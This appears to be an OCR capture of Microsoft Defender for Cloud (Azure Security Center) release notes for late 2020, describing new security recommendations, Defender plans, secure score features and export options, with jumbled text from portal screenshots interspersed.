9 Microsoft Defender for Cloud | Regulatory compliance & x 


Showing subscription Dei Test 1' 


| Ø Search (Ctrl+/) | « 


Š i Azure Security Benchmark | ISO 27001 PCI DSS 3.2.1 SOC TSP | Azure Security Benchmark (Deprecated) 
enera ei 


Under each applicable compliance control is the set of assessments run by Microsoft Defender for Cloud that are associated with that control. If they are 
all green, it means those assessments are currently passing; this does not ensure you are fully compliant with that control. Furthermore, not 

@ Getting started all controls for any particular regulation are covered by Microsoft Defender for Cloud assessments, and therefore this report is only a partial view of your 
overall compliance status. 


© overview 


y= Recommendations 


Azure Security Benchmark is applied to the subscription Dev1 Test 1 
Ọ Security alerts 


Inventory E Expand all compliance controls 


GO Community 


v © AM. Asset Management 
Cloud Security 


v © BR. Backup and Recovery 
© Secure Score 


B Ae v © DP. Data Protection 


9 Microsoft Defender for Cloud 


< 


© ES. Endpoint Security 


Existing recommendations are unaffected and as the benchmark grows, changes will automatically be 


reflected within Security Center. 
To learn more, see the following pages: 


e Learn more about Azure Security Benchmark 
e Customize the set of standards in your regulatory compliance dashboard 


Vulnerability assessment for on-premises and multicloud machines 
is released for general availability (GA) 


In October, we announced a preview for scanning Azure Arc-enabled servers with Azure Defender for 
Servers' integrated vulnerability assessment scanner (powered by Qualys). 


It's now released for general availability (GA). 


When you've enabled Azure Arc on your non-Azure machines, Security Center will offer to deploy the 
integrated vulnerability scanner on them - manually and at-scale. 


With this update, you can unleash the power of Azure Defender for Servers to consolidate your 
vulnerability management program across all of your Azure and non-Azure assets. 


Main capabilities: 


e Monitoring the VA (vulnerability assessment) scanner provisioning state on Azure Arc machines 

e Provisioning the integrated VA agent to unprotected Windows and Linux Azure Arc machines 
(manually and at-scale) 

e Receiving and analyzing detected vulnerabilities from deployed agents (manually and at-scale) 

e Unified experience for Azure VMs and Azure Arc machines 


Learn more about deploying the integrated Qualys vulnerability scanner to your hybrid machines. 


Learn more about Azure Arc-enabled servers. 


Secure score for management groups is now available in preview 


The secure score page now shows the aggregated secure scores for your management groups in 
addition to the subscription level. So now you can see the list of management groups in your 


organization and the score for each management group. 


9 Microsoft Defender for Cloud | Secure Score x 


Showing 73 subscriptions 
| P Search (Ctrl+/) | « Your Secure Score is a measure of the security posture of your 
subscription: the higher the score, the lower the identified risk level. Learn more > 
General 
1 1 MANAGEMENT GROUPS 5 SUBSCRIPTIONS 
D overview 
@ Getting started | D Search by subscription ... | | Collapse All | | Expand All Group by management groups: 
Y= Recommendations 
Name Secure Score Unhealthy res... Total resources 
9 Security alerts 
pelo) 72f988bf ® Restricted 2396 5240 
© Inventory 
d Community beld) Contoso (Showing 5 of 5) 59 145 View recommendations > 
via) IT (Showing 2 of 2) 17 29 View recommendations > 
Cloud Security x 
beld) App Team (Showing 2 of 2) 17 29 View recommendations > 
© Secure Score 
? Contoso Dev_India W 61% (25 of 41) 4 9 View recommendations > 
D Regulatory compliance 
? Contoso Dev_EUS W 43% (14 of 33) 13 20 View recommendations > 


O Microsoft Defender for Cloud fa E z 
IO) Infra Team (Showing 0of0) d Not applicable 


Learn more about secure score and security controls in Azure Security Center. 


Secure score API is released for general availability (GA) 


You can now access your score via the secure score API. The API methods provide the flexibility to 
query the data and build your own reporting mechanism of your secure scores over time. For example: 


e use the Secure Scores API to get the score for a specific subscription 
e use the Secure Score Controls API to list the security controls and the current score of your 
subscriptions 


Learn about external tools made possible with the secure score API in the secure score area of our 
GitHub community Z . 


Learn more about secure score and security controls in Azure Security Center. 


Dangling DNS protections added to Azure Defender for App 
Service 


Subdomain takeovers are a common, high-severity threat for organizations. A subdomain takeover can 
occur when you have a DNS record that points to a deprovisioned web site. Such DNS records are also 
known as “dangling DNS" entries. CNAME records are especially vulnerable to this threat. 


Subdomain takeovers enable threat actors to redirect traffic intended for an organization's domain to a 
site performing malicious activity. 


Azure Defender for App Service now detects dangling DNS entries when an App Service website is 
decommissioned. This is the moment at which the DNS entry is pointing at a non-existent resource, 
and your website is vulnerable to a subdomain takeover. These protections are available whether your 
domains are managed with Azure DNS or an external domain registrar and applies to both App Service 
on Windows and App Service on Linux. 


Learn more: 


e App Service alert reference table - Includes two new Azure Defender alerts that trigger when a 
dangling DNS entry is detected 

e Prevent dangling DNS entries and avoid subdomain takeover - Learn about the threat of 
subdomain takeover and the dangling DNS aspect 

e Introduction to Azure Defender for App Service 


Multicloud connectors are released for general availability (GA) 


With cloud workloads commonly spanning multiple cloud platforms, cloud security services must do 
the same. 


Azure Security Center protects workloads in Azure, Amazon Web Services (AWS), and Google Cloud 
Platform (GCP). 


Connecting your AWS or GCP projects integrates their native security tools like AWS Security Hub and 
GCP Security Command Center into Azure Security Center. 


This capability means that Security Center provides visibility and protection across all major cloud 
environments. Some of the benefits of this integration: 


e Automatic agent provisioning - Security Center uses Azure Arc to deploy the Log Analytics agent 
to your AWS instances 

e Policy management 

e Vulnerability management 

e Embedded Endpoint Detection and Response (EDR) 

e Detection of security misconfigurations 

e A single view showing security recommendations from all cloud providers 

e Incorporate all of your resources into Security Center's secure score calculations 

e Regulatory compliance assessments of your AWS and GCP resources 


From Defender for Cloud's menu, select Multicloud connectors and you'll see the options for creating 
new connectors: 


@ Microsoft Defender for Cloud | Multi cloud connectors & 


Showing 41 subscriptions 


+ Add AWS account +- Add GCP account | Č) Refresh 


Display name Environment Account / Org ID Subscription Status 


Learn more in: 


e Connect your AWS accounts to Azure Security Center 


e Connect your GCP projects to Azure Security Center 


Exempt entire recommendations from your secure score for 
subscriptions and management groups 


We're expanding the exemption capability to include entire recommendations. Providing further 
options to fine-tune the security recommendations that Security Center makes for your subscriptions, 


management group, or resources. 


Occasionally, a resource will be listed as unhealthy when you know the issue has been resolved by a 
third-party tool which Security Center hasn't detected. Or a recommendation will show in a scope 
where you feel it doesn't belong. The recommendation might be inappropriate for a specific 
subscription. Or perhaps your organization has decided to accept the risks related to the specific 


resource or recommendation. 
With this preview feature, you can now create an exemption for a recommendation to: 


e Exempt a resource to ensure it isn't listed with the unhealthy resources in the future, and doesn't 
impact your secure score. The resource will be listed as not applicable and the reason will be 
shown as "exempted" with the specific justification you select. 


e Exempt a subscription or management group to ensure that the recommendation doesn't 
impact your secure score and won't be shown for the subscription or management group in the 
future. This relates to existing resources and any you create in the future. The recommendation 
will be marked with the specific justification you select for the scope that you selected. 


Learn more in Exempting resources and recommendations from your secure score. 


Users can now request tenant-wide visibility from their global 
administrator 


If a user doesn't have permissions to see Security Center data, they'll now see a link to request 
permissions from their organization's global administrator. The request includes the role they'd like 


and the justification for why it's necessary. 


© Microsoft Defender for Cloud | Overview 


No subscriptions are selected 


A Search (Ctrl+/) « 


General 

D overview 

@ Getting started 
Y= Recommendations 
@ Security alerts 
Inventory 


GO Community 


Cloud Security 


Ọ Secure Score 


@ Regulatory compliance 


Ọ Microsoft Defender for 


Cloud 


Management 
thi Pricing & settings 
©: Security policy 


Security solutions 


ZA Workflow automation 


Ê Coverage 


@ Cloud connectors 


Y Subscriptions EA What's new 


#0 GO © y= 0 


Azure subscriptions AWS accounts GCP projects Active recommendations Security alerts 


DO Secure score (2) Regulatory compliance 


No subscriptions are selected No subscriptions are selected 


Improve your secure score > Improve your compliance > 


D Microsoft Defender for Cloud a Inventory 


No subscriptions are selected No subscriptions are selected 


Enhance your threat protection capabilities > Explore your resources > 


Learn more in Request tenant-wide permissions when yours are insufficient. 


35 preview recommendations added to increase coverage of Azure 
Security Benchmark 


Azure Security Benchmark is the default policy initiative in Azure Security Center. 


To increase the coverage of this benchmark, the following 35 preview recommendations have been 


added to Security Center. 


Q Tip 


Preview recommendations don't render a resource unhealthy, and they aren't included in the 


calculations of your secure score. Remediate them wherever possible, so that when the preview 


period ends they'll contribute towards your score. Learn more about how to respond to these 


recommendations in Remediate recommendations in Azure Security Center. 


Security control 


Enable encryption at rest 


New recommendations 


- Azure Cosmos DB accounts should use customer-managed keys to encrypt 
data at rest 

- Azure Machine Learning workspaces should be encrypted with a customer- 
managed key (CMK) 

- Bring your own key data protection should be enabled for MySQL servers 


Security control 


Implement security best practices 


Manage access and permissions 


Protect applications against DDoS 
attacks 


Restrict unauthorized network 
access 


Related links: 


New recommendations 


- Bring your own key data protection should be enabled for PostgreSQL 
servers 

- Azure Al services accounts should enable data encryption with a customer- 
managed key (CMK) 

- Container registries should be encrypted with a customer-managed key 
(CMK) 

- SQL managed instances should use customer-managed keys to encrypt 
data at rest 

- SQL servers should use customer-managed keys to encrypt data at rest 

- Storage accounts should use customer-managed key (CMK) for encryption 


- Subscriptions should have a contact email address for security issues 

- Auto provisioning of the Log Analytics agent should be enabled on your 
subscription 

- Email notification for high severity alerts should be enabled 

- Email notification to subscription owner for high severity alerts should be 
enabled 

- Key vaults should have purge protection enabled 

- Key vaults should have soft delete enabled 


- Function apps should have ‘Client Certificates (Incoming client certificates)’ 
enabled 


- Web Application Firewall (WAF) should be enabled for Application Gateway 
- Web Application Firewall (WAF) should be enabled for Azure Front Door 
Service service 


- Firewall should be enabled on Key Vault 

- Private endpoint should be configured for Key Vault 

- App Configuration should use private link 

- Azure Cache for Redis should reside within a virtual network 

- Azure Event Grid domains should use private link 

- Azure Event Grid topics should use private link 

- Azure Machine Learning workspaces should use private link 

- Azure SignalR Service should use private link 

- Azure Spring Cloud should use network injection 

- Container registries should not allow unrestricted network access 
- Container registries should use private link 

- Public network access should be disabled for MariaDB servers 

- Public network access should be disabled for MySQL servers 

- Public network access should be disabled for PostgreSQL servers 
- Storage account should use a private link connection 

- Storage accounts should restrict network access using virtual network rules 
- VM Image Builder templates should use private link 


e Learn more about Azure Security Benchmark 


e Learn more about Azure Database for MariaDB 


e Learn more about Azure Database for MySQL 


e Learn more about Azure Database for PostgreSQL 


CSV export of filtered list of recommendations 


In November 2020, we added filters to the recommendations page (Recommendations list now 
includes filters). In December, we expanded those filters (Recommendations page has new filters for 


environment, severity, and available responses). 


With this announcement, we're changing the behavior of the Download to CSV button so that the CSV 
export only includes the recommendations currently displayed in the filtered list. 


For example, in the image below you can see that the list has been filtered to two recommendations. 
The CSV file that is generated includes the status details for every resource affected by those two 


recommendations. 


y= Microsoft Defender for Cloud . 
E Showing 60 subscriptions | Recommendations GI 


| P Search (Ctrl+/) < d Download CSV report Q Guides & Feedback 
General EEEk ; f B è 

| Ø Search recommendations | Control status : Completed Recommendation status : All Rec 
E Overview Contains exemptions AI 


@ Getting started 


Controls 
Recommendations 
V Enable MFA @ Completed 
O Security alerts 
MFA should be enabled on accounts with owner permissions on your subscription © Completed 
£ Inventory 
MFA should be enabled on accounts with write permissions on your subscription @ Completed 
GO Community 
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Learn more in Security recommendations in Azure Security Center. 


"Not applicable" resources now reported as "Compliant" in Azure 
Policy assessments 


Previously, resources that were evaluated for a recommendation and found to be not applicable 
appeared in Azure Policy as "Non-compliant". No user actions could change their state to "Compliant". 


With this change, they're reported as "Compliant" for improved clarity. 


The only impact will be seen in Azure Policy where the number of compliant resources will increase. 


There will be no impact to your secure score in Azure Security Center. 


Export weekly snapshots of secure score and regulatory 
compliance data with continuous export (preview) 


We've added a new preview feature to the continuous export tools for exporting weekly snapshots of 


secure score and regulatory compliance data. 


When you define a continuous export, set the export frequency: 


Export frequency 


Export updates in real-time. 


D Streaming updates dk 


Export weekly snapshot of the data types selected under ‘Exported data types’. 
These supported data types are: overall Secure score, secure score controls, regulatory 
compliance. 


JU Snapshots (Preview) GO 


e Streaming - assessments will be sent when a resource’s health state is updated (if no updates 
occur, no data will be sent). 

e Snapshots — a snapshot of the current state of all regulatory compliance assessments will be sent 
every week (this is a preview feature for weekly snapshots of secure scores and regulatory 
compliance data). 


Learn more about the full capabilities of this feature in Continuously export Security Center data. 


December 2020 


Updates in December include: 


e Azure Defender for SQL servers on machines is generally available 

e Azure Defender for SQL support for Azure Synapse Analytics dedicated SQL pool is generally 
available 

e Global Administrators can now grant themselves tenant-level permissions 

e Two new Azure Defender plans: Azure Defender for DNS and Azure Defender for Resource 
Manager (in preview) 

e New security alerts page in the Azure portal (preview) 

e Revitalized Security Center experience in Azure SQL Database & SQL Managed Instance 

e Asset inventory tools and filters updated 

e Recommendation about web apps requesting SSL certificates no longer part of secure score 

e Recommendations page has new filters for environment, severity, and available responses 


e Continuous export gets new data types and improved deployifnotexist policies 
Azure Defender for SQL servers on machines is generally available 


Azure Security Center offers two Azure Defender plans for SQL Servers: 


e Azure Defender for Azure SQL database servers - defends your Azure-native SQL Servers 
e Azure Defender for SQL servers on machines - extends the same protections to your SQL servers 
in hybrid, multicloud, and on-premises environments 


With this announcement, Azure Defender for SQL now protects your databases and their data 
wherever they're located. 


Azure Defender for SQL includes vulnerability assessment capabilities. The vulnerability assessment 
tool includes the following advanced features: 


e Baseline configuration (New!) to intelligently refine the results of vulnerability scans to those that 
might represent real security issues. After you've established your baseline security state, the 
vulnerability assessment tool only reports deviations from that baseline state. Results that match 
the baseline are considered as passing subsequent scans. This lets you and your analysts focus 
your attention where it matters. 

e Detailed benchmark information to help you understand the discovered findings, and why they 
relate to your resources. 

e Remediation scripts to help you mitigate identified risks. 


Learn more about Azure Defender for SQL. 


Azure Defender for SQL support for Azure Synapse Analytics 
dedicated SQL pool is generally available 


Azure Synapse Analytics (formerly SQL DW) is an analytics service that combines enterprise data 
warehousing and big data analytics. Dedicated SQL pools are the enterprise data warehousing features 
of Azure Synapse. Learn more in What is Azure Synapse Analytics (formerly SQL DW)?. 


Azure Defender for SQL protects your dedicated SQL pools with: 


e Advanced threat protection to detect threats and attacks 
e Vulnerability assessment capabilities to identify and remediate security misconfigurations 


Azure Defender for SQL's support for Azure Synapse Analytics SQL pools is automatically added to 
Azure SQL databases bundle in Azure Security Center. You'll find a new “Azure Defender for SQL” tab in 
your Synapse workspace page in the Azure portal. 


Learn more about Azure Defender for SQL. 


Global Administrators can now grant themselves tenant-level 
permissions 


A user with the Azure Active Directory role of Global Administrator might have tenant-wide 
responsibilities, but lack the Azure permissions to view that organization-wide information in Azure 
Security Center. 


To assign yourself tenant-level permissions, follow the instructions in Grant tenant-wide permissions to 
yourself. 


Two new Azure Defender plans: Azure Defender for DNS and Azure 
Defender for Resource Manager (in preview) 


We've added two new cloud-native breadth threat protection capabilities for your Azure environment. 


These new protections greatly enhance your resiliency against attacks from threat actors, and 


significantly increase the number of Azure resources protected by Azure Defender. 


e Azure Defender for Resource Manager - automatically monitors all resource management 
operations performed in your organization. For more information, see: 
o Introduction to Azure Defender for Resource Manager 
o Respond to Azure Defender for Resource Manager alerts 
o List of alerts provided by Azure Defender for Resource Manager 


e Azure Defender for DNS - continuously monitors all DNS queries from your Azure resources. For 
more information, see: 
o Introduction to Azure Defender for DNS 
o Respond to Azure Defender for DNS alerts 
o List of alerts provided by Azure Defender for DNS 


New security alerts page in the Azure portal (preview) 
Azure Security Center's security alerts page has been redesigned to provide: 


e Improved triage experience for alerts - helping to reduce alerts fatigue and focus on the most 
relevant threats easier, the list includes customizable filters and grouping options 

e More information in the alerts list - such as MITRE ATT&ACK tactics 

e Button to create sample alerts - to evaluate Azure Defender capabilities and test your alerts 
configuration (for SIEM integration, email notifications, and workflow automations), you can 
create sample alerts from all Azure Defender plans 

e Alignment with Azure Sentinel's incident experience - for customers who use both products, 
switching between them is now a more straightforward experience and it's easy to learn one from 
the other 

e Better performance for large alerts lists 

e Keyboard navigation through the alert list 

e Alerts from Azure Resource Graph - you can query alerts in Azure Resource Graph, the Kusto-like 
API for all of your resources. This is also useful if you're building your own alerts dashboards. 
Learn more about Azure Resource Graph. 


To access the new experience, use the ‘try it now’ link from the banner at the top of the security alerts 
page. 


EO Security Center | Security alerts 


Showing 61 subscriptions 


Vf Filter 4 Download CSV report è Suppression rules ® Security alerts map (Preview) 
p pp 


(i) PREVIEW AVAILABLE: New security alerts page in Azure Security Center. Try it now > > 


To create sample alerts from the new alerts experience, see Generate sample Azure Defender alerts. 
Revitalized Security Center experience in Azure SQL Database & 


SQL Managed Instance 


The Security Center experience within SQL provides access to the following Security Center and Azure 
Defender for SQL features: 


e Security recommendations — Security Center periodically analyzes the security state of all 
connected Azure resources to identify potential security misconfigurations. It then provides 
recommendations on how to remediate those vulnerabilities and improve organizations’ security 
posture. 

e Security alerts — a detection service that continuously monitors Azure SQL activities for threats 
such as SQL injection, brute-force attacks, and privilege abuse. This service triggers detailed and 
action-oriented security alerts in Security Center and provides options for continuing 
investigations with Azure Sentinel, Microsoft's Azure-native SIEM solution. 

e Findings — a vulnerability assessment service that continuously monitors Azure SQL 
configurations and helps remediate vulnerabilities. Assessment scans provide an overview of 
Azure SQL security states together with detailed security findings. 


ra] samplecrmcwusdemo (samplecrmcwusdemo/samplecrmcwusdemo) | Microsoft Defender for Cloud & X 


SQL database @ Directory: Microsoft 


| E Search (Ctrl+/) 
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E Activity log 2 o 0 O 5 E 
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@ Diagnose and solve problems Recommendations 
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= Query editor (preview) 
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Sensitive data in your SQL databases should be classified @ High 
fo] Configure 

Transparent Data Encryption on SQL databases should be enabled @ Low 


E Geo-Replication 
Z= View additional recommendations on other resources in Microsoft Defender for Cloud > 
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1#) Sync to other databases an et 
Security incidents and alerts 
GO Add Azure Search 


It Properties Security Center uses advanced analytics and global threat intelligence to alert you to malicious activity. Alerts displayed below are from the past 21 days. 
Py Locks DU Check for Microsoft Defender Alerts on this resource in Microsoft Defender for Cloud > 
Security GO s e 
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E Auditing 

ID TL Security Check T4 Applies to TL Severity Ty 
E Data Discovery & Classification 

VA2108 Minimal set of principals should be members of fixed high impact database roles samplecrmcwusdemo @ High 


namic Data Maskin 
Ê Dy Data Masking 
VA1288 Sensitive data columns should be classified samplecrmcwusdemo A Medium 
© Microsoft Defender for Cloud 
VA2130 Track all users with access to the database samplecrmcwusdemo @ Low 
ransparent data encryption 
© Transparent dat rypti 
VA2109 Minimal set of principals should be members of fixed low impact database roles samplecrmcwusdemo O Low 


Asset inventory tools and filters updated 
The inventory page in Azure Security Center has been refreshed with the following changes: 


e Guides and feedback added to the toolbar. This opens a pane with links to related information 
and tools. 


e Subscriptions filter added to the default filters available for your resources. 


e Open query link for opening the current filter options as an Azure Resource Graph query 
(formerly called "View in resource graph explorer"). 


e Operator options for each filter. Now you can choose from more logical operators other than '='. 
For example, you might want to find all resources with active recommendations whose titles 
include the string ‘encrypt’. 


Recommendations == All >< 


Recommendations 


Filter | Recommendations =v 


Operator 


contains 


Learn more about inventory in Explore and manage your resources with asset inventory. 


Recommendation about web apps requesting SSL certificates no 
longer part of secure score 


The recommendation "Web apps should request an SSL certificate for all incoming requests" has been 
moved from the security control Manage access and permissions (worth a maximum of 4 pts) into 
Implement security best practices (which is worth no points). 


Ensuring a web app requests a certificate certainly makes it more secure. However, for public-facing 
web apps it's irrelevant. If you access your site over HTTP and not HTTPS, you will not receive any client 
certificate. So if your application requires client certificates, you should not allow requests to your 
application over HTTP. Learn more in Configure TLS mutual authentication for Azure App Service. 


With this change, the recommendation is now a recommended best practice that does not impact your 


score. 


Learn which recommendations are in each security control in Security controls and their 


recommendations. 


Recommendations page has new filters for environment, severity, 
and available responses 


Azure Security Center monitors all connected resources and generates security recommendations. Use 
these recommendations to strengthen your hybrid cloud posture and track compliance with the 
policies and standards relevant to your organization, industry, and country/region. 


As Security Center continues to expand its coverage and features, the list of security recommendations 
is growing every month. For example, see 29 preview recommendations added to increase coverage of 
Azure Security Benchmark. 


With the growing list, there's a need to filter the recommendations to find the ones of greatest 
interest. In November, we added filters to the recommendations page (see Recommendations list now 


includes filters). 


The filters added this month provide options to refine the recommendations list according to: 


e Environment - View recommendations for your AWS, GCP, or Azure resources (or any 
combination) 


e Severity - View recommendations according to the severity classification set by Security Center 


e Response actions - View recommendations according to the availability of Security Center 
response options: Fix, Deny, and Enforce 


Q Tip 
The response actions filter replaces the Quick fix available (Yes/No) filter. 


Learn more about each of these response options: 
o Fix button 


o Prevent misconfigurations with Enforce/Deny recommendations 


y= Microsoft Defender for Cloud | Recommendations 


~~ Showing 59 subscriptions 
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Controls Potential score increase Unhealthy resources Resource Health 

> Remediate vulnerabilities + 9% (6 points) 216 of 255 resources a 

> Enable encryption at rest + 5% (3 points) 213 of 298 resources ——L= 

> Remediate security configurations + 5% (3 points) 180 of 265 resources aa 
> Apply system updates + 3% (2 points) 115 of 362 resources —= Ul 

> Enable Azure Defender + 0% (0 points) 13 of 27 resources ——= 
> Implement security best practices + 0% (0 points) 273 of 1276 resources — è “@ 
> Enable MFA @ Completed + 0% (0 points) None Be  =— 


Continuous export gets new data types and improved 
deployifnotexist policies 


Azure Security Center's continuous export tools enable you to export Security Center's 


recommendations and alerts for use with other monitoring tools in your environment. 


Continuous export lets you fully customize what will be exported, and where it will go. For full details, 
see Continuously export Security Center data. 


These tools have been enhanced and expanded in the following ways: 
e Continuous export's deployifnotexist policies enhanced. The policies now: 


o Check whether the configuration is enabled. If it isn't, the policy will show as non-compliant 
and create a compliant resource. Learn more about the supplied Azure Policy templates in the 


"Deploy at scale with Azure Policy tab" in Set up a continuous export. 


o Support exporting security findings. When using the Azure Policy templates, you can 
configure your continuous export to include findings. This is relevant when exporting 
recommendations that have 'sub' recommendations, like findings from vulnerability 
assessment scanners or specific system updates for the ‘parent’ recommendation "System 
updates should be installed on your machines”. 


o Support exporting secure score data. 


e Regulatory compliance assessment data added (in preview). You can now continuously export 
updates to regulatory compliance assessments, including for any custom initiatives, to a Log 
Analytics workspace or Event Hubs. This feature is unavailable on national clouds. 
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Updates in November include: 
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Configure streaming export setting of Microsoft Defender for Cloud data to multiple export targets. 
Exporting Microsoft Defender for Cloud's data also enables you to use experiences such as integration 


with 3rd-party SIEM and Azure Data Explorer. 
Learn More > 
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e 29 preview recommendations added to increase coverage of Azure Security Benchmark 
e NIST SP 800 171 R2 added to Security Center's regulatory compliance dashboard 
e Recommendations list now includes filters 


e Auto provisioning experience improved and expanded 


e Secure score is now available in continuous export (preview) 


e "System updates should be installed on your machines" recommendation now includes 


subrecommendations 


e Policy management page in the Azure portal now shows status of default policy assignments 


29 preview recommendations added to increase coverage of Azure 


Security Benchmark 


Azure Security Benchmark is the Microsoft-authored, Azure-specific, set of guidelines for security and 


compliance best practices based on common compliance frameworks. Learn more about Azure 


Security Benchmark. 


The following 29 preview recommendations have been added to Security Center to increase the 
coverage of this benchmark. 


Preview recommendations don't render a resource unhealthy, and they aren't included in the 
calculations of your secure score. Remediate them wherever possible, so that when the preview period 
ends they'll contribute towards your score. Learn more about how to respond to these 


recommendations in Remediate recommendations in Azure Security Center. 


Security control New recommendations 
Encrypt data in transit - Enforce SSL connection should be enabled for PostgreSQL database 
servers 


- Enforce SSL connection should be enabled for MySQL database servers 
- TLS should be updated to the latest version for your API app 

- TLS should be updated to the latest version for your function app 

- TLS should be updated to the latest version for your web app 

- FTPS should be required in your API App 

- FTPS should be required in your function App 

- FTPS should be required in your web App 


Manage access and permissions - Web apps should request an SSL certificate for all incoming requests 
- Managed identity should be used in your API App 
- Managed identity should be used in your function App 
- Managed identity should be used in your web App 


Restrict unauthorized network - Private endpoint should be enabled for PostgreSQL servers 
access - Private endpoint should be enabled for MariaDB servers 
- Private endpoint should be enabled for MySQL servers 


Enable auditing and logging - Diagnostic logs in App Services should be enabled 


Implement security best practices - Azure Backup should be enabled for virtual machines 
- Geo-redundant backup should be enabled for Azure Database for MariaDB 
- Geo-redundant backup should be enabled for Azure Database for MySQL 
- Geo-redundant backup should be enabled for Azure Database for 
PostgreSQL 
- PHP should be updated to the latest version for your API app 
- PHP should be updated to the latest version for your web app 
- Java should be updated to the latest version for your API app 
- Java should be updated to the latest version for your function app 
- Java should be updated to the latest version for your web app 
- Python should be updated to the latest version for your API app 
- Python should be updated to the latest version for your function app 
- Python should be updated to the latest version for your web app 
- Audit retention for SQL servers should be set to at least 90 days 


Related links: 


e Learn more about Azure Security Benchmark 

e Learn more about Azure API apps 

e Learn more about Azure function apps 

e Learn more about Azure web apps 

e Learn more about Azure Database for MariaDB 

e Learn more about Azure Database for MySQL 

e Learn more about Azure Database for PostgreSQL 


NIST SP 800 171 R2 added to Security Center's regulatory 
compliance dashboard 


The NIST SP 800-171 R2 standard is now available as a built-in initiative for use with Azure Security 
Center's regulatory compliance dashboard. The mappings for the controls are described in Details of 
the NIST SP 800-171 R2 Regulatory Compliance built-in initiative. 


To apply the standard to your subscriptions and continuously monitor your compliance status, use the 
instructions in Customize the set of standards in your regulatory compliance dashboard. 


Q Microsoft Defender for Cloud | Regulatory compliance & 


Showing subscription ‘ASC DEMO 


d Download report [*: Manage compliance policies 


Regulatory compliance assessment Regulatory standards compliance status 

Failed 

| NIST SP 800 171 R2 2 of 23 passed controls 
177 

425 Passed | HIPAA HITRUST 2 of 22 passed controls 
ee 241 

Skipped | NIST SP 800 53 R4 4 of 29 passed controls 

7 | azure Security Benchmark B of 37 passed controls 


Azure Security Benchmark PCI DSS 3.2.1 HIPAA HITRUST NIST SP 800 53 R4 NIST SP 800 171 R2 


Under each applicable compliance control is the set of assessments run by Microsoft Defender for Cloud that are a par 
does not ensure you are fully compliant with that control. Furthermore, not all controls for any particular regulation are co 
view of your overall compliance status. 


NIST SP 800 171 R2 is applied to the subscription ASC DEMO 


JU Expand all compliance controls 


v © 3.1. Access Control 


< 


3.2. Awareness and Training 


For more information about this compliance standard, see NIST SP 800-171 R2 Z. 


Recommendations list now includes filters 


You can now filter the list of security recommendations according to a range of criteria. In the following 
example, the recommendations list has been filtered to show recommendations that: 


e are generally available (that is, not preview) 
e are for storage accounts 
e support quick fix remediation 


P Search recommen.. Reset Group by controls: 


filters €D On 
Controls Potential score increase Unhealthy resources Resource Health 
V Encrypt data in transit + 3% (2 points) 136 of 348 resources B 
Secure transfer to storage accounts should be enabled | Quick Fixt_ | Ze 103 of 280 storage accounts RN [it 


Auto provisioning experience improved and expanded 


The auto provisioning feature helps reduce management overhead by installing the required 
extensions on new - and existing - Azure VMs so they can benefit from Security Center's protections. 


As Azure Security Center grows, more extensions have been developed and Security Center can 
monitor a larger list of resource types. The auto provisioning tools have now been expanded to 
support other extensions and resource types by leveraging the capabilities of Azure Policy. 


You can now configure the auto provisioning of: 


e Log Analytics agent 
e (New) Azure Policy for Kubernetes 
e (New) Microsoft Dependency agent 


Learn more in Auto provisioning agents and extensions from Azure Security Center. 


Secure score is now available in continuous export (preview) 


With continuous export of secure score, you can stream changes to your score in real-time to Azure 
Event Hubs or a Log Analytics workspace. Use this capability to: 


e track your secure score over time with dynamic reports 
e export secure score data to Azure Sentinel (or any other SIEM) 
e integrate this data with any processes you might already be using to monitor secure score in your 


organization 


Learn more about how to Continuously export Security Center data. 


"System updates should be installed on your machines" 
recommendation now includes subrecommendations 


The System updates should be installed on your machines recommendation has been enhanced. The 
new version includes subrecommendations for each missing update and brings the following 


improvements: 


e A redesigned experience in the Azure Security Center pages of the Azure portal. The 
recommendation details page for System updates should be installed on your machines 
includes the list of findings as shown below. When you select a single finding, the details pane 
opens with a link to the remediation information and a list of affected resources. 


Dashboard > Microsoft Defender for Cloud > Missing system update x 
System updates should be installec 


A^ Description 


^ Description 2020-09 Servicing Stack Update for Windows Server 


Install missing system security and critical updates to secure your WV 2016 for x64-based Systems (KB4576750) 


v Remediation steps ^ General information 
ea Affected resources Operating System Windows Server 2016 
KBID 4576750 
^ Security Checks edi 
Classification Security Updates 
Findings Severity @ High 
- Release Date 10/13/2020 12:00:00 AM 
| Ø Search to filter items... 
Status © Unhealthy 


Security Check 1 
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2019-04 Cumulative Update for Windows Server 2016... £ 
https://support.microsoft.com/kb/4576750 & 


2020-10 Security Update for Adobe Flash Player for .. £ 


: . ^ Affected resources 
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RHSA-2017:2563 openssh_0:5.3p1-123.el6_9 security u... £ g WinVmss6_4 OMS Devi Test 1 
RHSA-2017:2563 openssh-clients_0:5.3p1-123.el6_9 se... £ E WinVmss6_1 OMS Dev Test 1 
E sea OMS Dev! Test 1 


Trigger logic app 


e Enriched data for the recommendation from Azure Resource Graph (ARG). ARG is an Azure 
service that's designed to provide efficient resource exploration. You can use ARG to query at 
scale across a given set of subscriptions so that you can effectively govern your environment. 


For Azure Security Center, you can use ARG and the Kusto Query Language (KQL) to query a wide 
range of security posture data. 


Previously, if you queried this recommendation in ARG, the only available information was that 
the recommendation needs to be remediated on a machine. The following query of the enhanced 


version will return each missing system updates grouped by machine. 


Kusto 


securityresources 

| where type =~ "microsoft.security/assessments/subassessments" 

| where extract(@"(?i)providers/Microsoft.Security/assessments/([*/]*)", 1, id) == 
"4ab6e3c5-74dd-8b35-9ab9 - £61b30875b27" 

| where properties.status.code == "Unhealthy" 


Policy management page in the Azure portal now shows status of 
default policy assignments 


You can now see whether or not your subscriptions have the default Security Center policy assigned, in 
the Security Center's security policy page of the Azure portal. 


©: Microsoft Defender for Cloud | Security policy & x 
Showing 61 subscriptions 

| P Search (Ctri+/) | « A. l 

General ®:: Policy Management 

E overview Choose a subscription or management group from the list below to perform the following tasks: 


- View and edit the default ASC policy 


@ Getting started 
eee - Add a custom policy 


Z= Recommendations - Add regulatory compliance standards to your compliance dashboard 
@ Security alerts Click here to learn more > 
fð Inventory 
17 MANAGEMENT GROUPS 59 SUBSCRIPTIONS 

OO Community 
cina Semily | P Search by name 

oud Securi 

Name Default policy 
© Secure Score 
Ọ Regulatory compliance KO (4) gerala 
Ọ Microsoft Defender for Cloud = b Limited permissions 
? ASC DEMO Assigned (2) 


Management 


v [4] 3 ce Limited permissions 
IN Pricing & settings e 


E 3 = v EA 1 Limited permissions 
*: Security policy a 


7 e ontoso Hotels Not assigned 
Security solutions ? contos g 


Ta Workflow automation ? Contoso Hotels - Dev Assigned 


October 2020 


Updates in October include: 


e Vulnerability assessment for on-premises and multicloud machines (preview) 

e Azure Firewall recommendation added (preview) 

e Authorized IP ranges should be defined on Kubernetes Services recommendation updated with 
quick fix 

